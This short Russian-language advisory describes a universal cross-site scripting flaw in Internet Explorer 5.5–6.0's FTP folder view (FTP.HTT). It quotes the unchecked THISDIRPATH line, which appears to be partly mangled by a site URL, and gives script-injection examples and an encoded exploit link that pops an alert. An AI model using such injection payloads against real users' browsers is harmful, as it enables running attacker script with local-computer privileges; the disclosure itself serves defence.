В Microsoft Internet Explorer обнаружена возможность универсального межсайтового скриптинга. Данные, включенные в FTP URL, могут интерпретироваться как содержание,
что позволяет выполнять произвольный JavaScript
код с настройками безопасности для зоны Local Computer.

Уязвимость возникает при включенном режиме «Folder View for FTP sites» и опции ‘Enable Web content in folders’ в
Эксплорере.

Проблема находится в файле FTP.HTT, отвечающем
за функцию ‘Folder view for FTP sites’ (%SystemRoot%\WEB\FTP.HTT). В строке:

———FTP.HTT———————
35: <BASE href=»https://xakep.ru/wp-content/uploads/post/15488/%THISDIRPATH%\»>
—————————————

Переменная THISDIRPATH не проверяется перед обработкой.

Пример1:

[ ftp://TARGET ]
‘%THISDIRPATH%’ = ‘ftp://TARGET/’
<BASE href="ftp://TARGET/\">

Пример 2:

[ ftp://»><script>alert(«Exploit»);</script> ]
‘%THISDIRPATH%’ = ‘ftp://»><script>alert(«Exploit»);</script>/’
<BASE href=»ftp://»><script>alert(«Exploit»);</script>/\»>
Эксплоит:
<a href=»ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20″ target=»_blank»>Exploit</a>

Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0.

Оставить мнение